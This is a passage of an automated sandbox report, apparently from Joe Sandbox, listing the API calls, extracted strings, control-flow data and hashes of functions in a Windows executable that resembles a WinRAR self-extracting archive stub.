                                                                      • GlobalFree.KERNEL32(00000000), ref: 007DA7CD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: GlobalResource$AllocGdipLock$BitmapCreateFindFreeFromLoadSizeofUnlock
                                                                      • String ID: PNG
                                                                      • API String ID: 541704414-364855578
                                                                      • Opcode ID: c0b88e0081f1c3f0872060bb7c402ad57c80b26e63ffbced7c3420f7ab8811e4
                                                                      • Instruction ID: 6b17957302e1fe8da842533a478541104f21bca0f7772b16166f9161890d97e9
                                                                      • Opcode Fuzzy Hash: c0b88e0081f1c3f0872060bb7c402ad57c80b26e63ffbced7c3420f7ab8811e4
                                                                      • Instruction Fuzzy Hash: 17317C75600706FFDB109F21EC88D2BBBB9FF84770B04451AF90582320EB39D944DAA2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      control_flow_graph 1041 7ca69b-7ca6bf call 7dec50 1044 7ca727-7ca730 FindNextFileW 1041->1044 1045 7ca6c1-7ca6ce FindFirstFileW 1041->1045 1046 7ca742-7ca7ff call 7d0602 call 7cc310 call 7d15da * 3 1044->1046 1047 7ca732-7ca740 GetLastError 1044->1047 1045->1046 1048 7ca6d0-7ca6e2 call 7cbb03 1045->1048 1052 7ca804-7ca811 1046->1052 1049 7ca719-7ca722 1047->1049 1056 7ca6fe-7ca707 GetLastError 1048->1056 1057 7ca6e4-7ca6fc FindFirstFileW 1048->1057 1049->1052 1059 7ca709-7ca70c 1056->1059 1060 7ca717 1056->1060 1057->1046 1057->1056 1059->1060 1062 7ca70e-7ca711 1059->1062 1060->1049 1062->1060 1064 7ca713-7ca715 1062->1064 1064->1049
                                                                      APIs
                                                                      • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,007CA592,000000FF,?,?), ref: 007CA6C4
                                                                        • Part of subcall function 007CBB03: _wcslen.LIBCMT ref: 007CBB27
                                                                      • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,007CA592,000000FF,?,?), ref: 007CA6F2
                                                                      • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,007CA592,000000FF,?,?), ref: 007CA6FE
                                                                      • FindNextFileW.KERNEL32(?,?,?,?,?,?,007CA592,000000FF,?,?), ref: 007CA728
                                                                      • GetLastError.KERNEL32(?,?,?,?,007CA592,000000FF,?,?), ref: 007CA734
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                                                      • String ID:
                                                                      • API String ID: 42610566-0
                                                                      • Opcode ID: ed1e9d8a8679618d47be9c679064b790230d5ad25092139fc461b6b6c4e79c65
                                                                      • Instruction ID: bed0503e9eb71ccab5363585f4730bd9281f4545d2774090a3cf0619d057d022
                                                                      • Opcode Fuzzy Hash: ed1e9d8a8679618d47be9c679064b790230d5ad25092139fc461b6b6c4e79c65
                                                                      • Instruction Fuzzy Hash: A3416072500519ABCB25DF64CC88BE9B7B8FB48355F14419AE56DE3200D738AE90CF94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetCurrentProcess.KERNEL32(?,?,007E7DC4,?,007FC300,0000000C,007E7F1B,?,00000002,00000000), ref: 007E7E0F
                                                                      • TerminateProcess.KERNEL32(00000000,?,007E7DC4,?,007FC300,0000000C,007E7F1B,?,00000002,00000000), ref: 007E7E16
                                                                      • ExitProcess.KERNEL32 ref: 007E7E28
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: Process$CurrentExitTerminate
                                                                      • String ID:
                                                                      • API String ID: 1703294689-0
                                                                      • Opcode ID: 07d54d8d5a81fc4fb7118a4e502eb9a76a59f8337ba845f0835968e9f76b1359
                                                                      • Instruction ID: 72ee813c1dde05055c95cd6bd886a1adc86391f15366bb8fb7bdac96b2ae5f52
                                                                      • Opcode Fuzzy Hash: 07d54d8d5a81fc4fb7118a4e502eb9a76a59f8337ba845f0835968e9f76b1359
                                                                      • Instruction Fuzzy Hash: C6E0BF31005598EBCF156F55DD0E95A7F6AEF54341B008495F8158A132CB3DEE51CB94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog
                                                                      • String ID:
                                                                      • API String ID: 3519838083-0
                                                                      • Opcode ID: bb365d0f5b4db49b79ccd19179d090ebf6c11ab230fd4fc5ecc5f71534523797
                                                                      • Instruction ID: 1eae1b18d34432e02001e9a56acd7d45aabe0b2aed9b2bc083c8deda6590bece
                                                                      • Opcode Fuzzy Hash: bb365d0f5b4db49b79ccd19179d090ebf6c11ab230fd4fc5ecc5f71534523797
                                                                      • Instruction Fuzzy Hash: 05822C70904245EEDF65DF64C885FFAB7B9BF05300F0841BEE9499B242DB385A84CB62
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog
                                                                      • String ID:
                                                                      • API String ID: 3519838083-0
                                                                      • Opcode ID: 63a80e35a56d544f1db8c1d16e01ffd0d853c5f229beee116b562679b10072d3
                                                                      • Instruction ID: 79c6ca691b853107995c94a7fad3a9b3d67dfce989c92396baa330ab2e5adff5
                                                                      • Opcode Fuzzy Hash: 63a80e35a56d544f1db8c1d16e01ffd0d853c5f229beee116b562679b10072d3
                                                                      • Instruction Fuzzy Hash: 4FD1C6B16083448FDB14CF28C88475BBBF1BF89318F08456EE9899B342E778E905CB56
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • __EH_prolog.LIBCMT ref: 007DB7E5
                                                                        • Part of subcall function 007C1316: GetDlgItem.USER32(00000000,00003021), ref: 007C135A
                                                                        • Part of subcall function 007C1316: SetWindowTextW.USER32(00000000,007F35F4), ref: 007C1370
                                                                      • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 007DB8D1
                                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 007DB8EF
                                                                      • IsDialogMessageW.USER32(?,?), ref: 007DB902
                                                                      • TranslateMessage.USER32(?), ref: 007DB910
                                                                      • DispatchMessageW.USER32(?), ref: 007DB91A
                                                                      • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 007DB93D
                                                                      • KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 007DB960
                                                                      • GetDlgItem.USER32(?,00000068), ref: 007DB983
                                                                      • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 007DB99E
                                                                      • SendMessageW.USER32(00000000,000000C2,00000000,007F35F4), ref: 007DB9B1
                                                                        • Part of subcall function 007DD453: _wcschr.LIBVCRUNTIME ref: 007DD45C
                                                                        • Part of subcall function 007DD453: _wcslen.LIBCMT ref: 007DD47D
                                                                      • SetFocus.USER32(00000000), ref: 007DB9B8
                                                                      • _swprintf.LIBCMT ref: 007DBA24
                                                                        • Part of subcall function 007C4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 007C40A5
                                                                        • Part of subcall function 007DD4D4: GetDlgItem.USER32(00000068,0081FCB8), ref: 007DD4E8
                                                                        • Part of subcall function 007DD4D4: ShowWindow.USER32(00000000,00000005,?,?,?,007DAF07,00000001,?,?,007DB7B9,007F506C,0081FCB8,0081FCB8,00001000,00000000,00000000), ref: 007DD510
                                                                        • Part of subcall function 007DD4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 007DD51B
                                                                        • Part of subcall function 007DD4D4: SendMessageW.USER32(00000000,000000C2,00000000,007F35F4), ref: 007DD529
                                                                        • Part of subcall function 007DD4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 007DD53F
                                                                        • Part of subcall function 007DD4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 007DD559
                                                                        • Part of subcall function 007DD4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 007DD59D
                                                                        • Part of subcall function 007DD4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 007DD5AB
                                                                        • Part of subcall function 007DD4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 007DD5BA
                                                                        • Part of subcall function 007DD4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 007DD5E1
                                                                        • Part of subcall function 007DD4D4: SendMessageW.USER32(00000000,000000C2,00000000,007F43F4), ref: 007DD5F0
                                                                      • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 007DBA68
                                                                      • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 007DBA90
                                                                      • GetTickCount.KERNEL32 ref: 007DBAAE
                                                                      • _swprintf.LIBCMT ref: 007DBAC2
                                                                      • GetLastError.KERNEL32(?,00000011), ref: 007DBAF4
                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 007DBB43
                                                                      • _swprintf.LIBCMT ref: 007DBB7C
                                                                      • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 007DBBD0
                                                                      • GetCommandLineW.KERNEL32 ref: 007DBBEA
                                                                      • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 007DBC47
                                                                      • ShellExecuteExW.SHELL32(0000003C), ref: 007DBC6F
                                                                      • Sleep.KERNEL32(00000064), ref: 007DBCB9
                                                                      • UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 007DBCE2
                                                                      • CloseHandle.KERNEL32(00000000), ref: 007DBCEB
                                                                      • _swprintf.LIBCMT ref: 007DBD1E
                                                                      • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 007DBD7D
                                                                      • SetDlgItemTextW.USER32(?,00000065,007F35F4), ref: 007DBD94
                                                                      • GetDlgItem.USER32(?,00000065), ref: 007DBD9D
                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 007DBDAC
                                                                      • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 007DBDBB
                                                                      • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 007DBE68
                                                                      • _wcslen.LIBCMT ref: 007DBEBE
                                                                      • _swprintf.LIBCMT ref: 007DBEE8
                                                                      • SendMessageW.USER32(?,00000080,00000001,?), ref: 007DBF32
                                                                      • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 007DBF4C
                                                                      • GetDlgItem.USER32(?,00000068), ref: 007DBF55
                                                                      • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 007DBF6B
                                                                      • GetDlgItem.USER32(?,00000066), ref: 007DBF85
                                                                      • SetWindowTextW.USER32(00000000,0080A472), ref: 007DBFA7
                                                                      • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 007DC007
                                                                      • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 007DC01A
                                                                      • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 007DC0BD
                                                                      • EnableWindow.USER32(00000000,00000000), ref: 007DC197
                                                                      • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 007DC1D9
                                                                        • Part of subcall function 007DC73F: __EH_prolog.LIBCMT ref: 007DC744
                                                                      • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 007DC1FD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                       • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l_wcschr
                                                                      • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$PDGu<}$STARTDLG$^}$__tmp_rar_sfx_access_check_%u$h}$winrarsfxmappingfile.tmp
                                                                      • API String ID: 3829768659-445573310
                                                                      • Opcode ID: 1b995f9da3d9aab602b22f3efb7eb76cb45accbd2842fa7e6c7967e64b1fbaaf
                                                                      • Instruction ID: 674d2a34a613b835f41e32798a9d278f58262e75935e1ea472b97cb86716b8a8
                                                                      • Opcode Fuzzy Hash: 1b995f9da3d9aab602b22f3efb7eb76cb45accbd2842fa7e6c7967e64b1fbaaf
                                                                      • Instruction Fuzzy Hash: D442F3B1944659FAEB22ABB0DC4EFBE777CBB01700F00405AF644A62D2CB7C5A44CB65
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(kernel32), ref: 007D087C
                                                                      • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 007D088E
                                                                      • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 007D08BF
                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 007D0B69
                                                                      • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007D0B83
                                                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 007D0B93
                                                                      • ReadFile.KERNEL32(00000000,?,00007FFE,007F3C7C,00000000), ref: 007D0BB1
                                                                      • CloseHandle.KERNEL32(00000000), ref: 007D0C09
                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 007D0C1E
                                                                      • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,007F3C7C,?,00000000,?,00000800), ref: 007D0C72
                                                                      • GetFileAttributesW.KERNELBASE(?,?,007F3C7C,00000800,?,00000000,?,00000800), ref: 007D0C9C
                                                                      • GetFileAttributesW.KERNEL32(?,?,007F3D44,00000800), ref: 007D0CD8
                                                                        • Part of subcall function 007D081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 007D0836
                                                                        • Part of subcall function 007D081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,007CF2D8,Crypt32.dll,00000000,007CF35C,?,?,007CF33E,?,?,?), ref: 007D0858
                                                                      • _swprintf.LIBCMT ref: 007D0D4A
                                                                      • _swprintf.LIBCMT ref: 007D0D96
                                                                        • Part of subcall function 007C4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 007C40A5
                                                                      • AllocConsole.KERNEL32 ref: 007D0D9E
                                                                      • GetCurrentProcessId.KERNEL32 ref: 007D0DA8
                                                                      • AttachConsole.KERNEL32(00000000), ref: 007D0DAF
                                                                      • _wcslen.LIBCMT ref: 007D0DC4
                                                                      • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 007D0DD5
                                                                      • WriteConsoleW.KERNEL32(00000000), ref: 007D0DDC
                                                                      • Sleep.KERNEL32(00002710), ref: 007D0DE7
                                                                      • FreeConsole.KERNEL32 ref: 007D0DED
                                                                      • ExitProcess.KERNEL32 ref: 007D0DF5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                       • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                                                                      • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                                                                      • API String ID: 1207345701-3298887752
                                                                      • Opcode ID: cdf9bdcb415d9eb8e1a9c62982bcd886efcb78fb78ac2ea9c896716f073931c3
                                                                      • Instruction ID: f4f8135009e4a261c23a1b0593717d329235084b6aa27ec9c85a140185820e90
                                                                      • Opcode Fuzzy Hash: cdf9bdcb415d9eb8e1a9c62982bcd886efcb78fb78ac2ea9c896716f073931c3
                                                                      • Instruction Fuzzy Hash: AFD15AB1504348ABD7219F50C849BAFBBF9BF85704F50492EF38996350DB7C8648CBA6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • __EH_prolog.LIBCMT ref: 007DC744
                                                                        • Part of subcall function 007DB314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 007DB3FB
                                                                        • Part of subcall function 007DAF98: _wcschr.LIBVCRUNTIME ref: 007DB033
                                                                      • _wcslen.LIBCMT ref: 007DCA0A
                                                                      • _wcslen.LIBCMT ref: 007DCA13
                                                                      • SetWindowTextW.USER32(?,?), ref: 007DCA71
                                                                      • _wcslen.LIBCMT ref: 007DCAB3
                                                                      • _wcsrchr.LIBVCRUNTIME ref: 007DCBFB
                                                                      • GetDlgItem.USER32(?,00000066), ref: 007DCC36
                                                                      • SetWindowTextW.USER32(00000000,?), ref: 007DCC46
                                                                      • SendMessageW.USER32(00000000,00000143,00000000,0080A472), ref: 007DCC54
                                                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 007DCC7F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                       • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcschr_wcsrchr
                                                                      • String ID: %s.%d.tmp$<br>$<}$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$}
                                                                      • API String ID: 986293930-4027513541
                                                                      • Opcode ID: 413d17f9cf0f250cfd4a83ec03152c2637243f22797d814b2d3b996ae228d667
                                                                      • Instruction ID: be91057a104c9ca1d56693f848d127219f18b53f29bc27abdc0b24045a78302f
                                                                      • Opcode Fuzzy Hash: 413d17f9cf0f250cfd4a83ec03152c2637243f22797d814b2d3b996ae228d667
                                                                      • Instruction Fuzzy Hash: B6E155B2900159EADB25DBA4DD59EEE73BCAF04350F4480A7F649E7140EB789E44CF60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • __EH_prolog.LIBCMT ref: 007CDA70
                                                                      • _wcschr.LIBVCRUNTIME ref: 007CDA91
                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 007CDAAC
                                                                        • Part of subcall function 007CC29A: _wcslen.LIBCMT ref: 007CC2A2
                                                                        • Part of subcall function 007D05DA: _wcslen.LIBCMT ref: 007D05E0
                                                                        • Part of subcall function 007D1B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,007CBAE9,00000000,?,?,?,0001047C), ref: 007D1BA0
                                                                      • _wcslen.LIBCMT ref: 007CDDE9
                                                                      • __fprintf_l.LIBCMT ref: 007CDF1C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                       • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
                                                                      • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
                                                                      • API String ID: 557298264-801612888
                                                                      • Opcode ID: 4e44441c17e529e8420631a31150f71e8de2372d10935facbd0ccae8b6879c25
                                                                      • Instruction ID: 9b9c114a09483857cf47e70cffc253dcd4aa9063a1ccc62bf4437418d83aafe3
                                                                      • Opcode Fuzzy Hash: 4e44441c17e529e8420631a31150f71e8de2372d10935facbd0ccae8b6879c25
                                                                      • Instruction Fuzzy Hash: 2232C071900218EBCB24EF68C849FEA77A5FF18704F54416EF90697281E7B9ED85CB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      APIs
                                                                        • Part of subcall function 007DB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 007DB579
                                                                        • Part of subcall function 007DB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 007DB58A
                                                                        • Part of subcall function 007DB568: IsDialogMessageW.USER32(0001047C,?), ref: 007DB59E
                                                                        • Part of subcall function 007DB568: TranslateMessage.USER32(?), ref: 007DB5AC
                                                                        • Part of subcall function 007DB568: DispatchMessageW.USER32(?), ref: 007DB5B6
                                                                      • GetDlgItem.USER32(00000068,0081FCB8), ref: 007DD4E8
                                                                      • ShowWindow.USER32(00000000,00000005,?,?,?,007DAF07,00000001,?,?,007DB7B9,007F506C,0081FCB8,0081FCB8,00001000,00000000,00000000), ref: 007DD510
                                                                      • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 007DD51B
                                                                      • SendMessageW.USER32(00000000,000000C2,00000000,007F35F4), ref: 007DD529
                                                                      • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 007DD53F
                                                                      • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 007DD559
                                                                      • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 007DD59D
                                                                      • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 007DD5AB
                                                                      • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 007DD5BA
                                                                      • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 007DD5E1
                                                                      • SendMessageW.USER32(00000000,000000C2,00000000,007F43F4), ref: 007DD5F0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                       • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
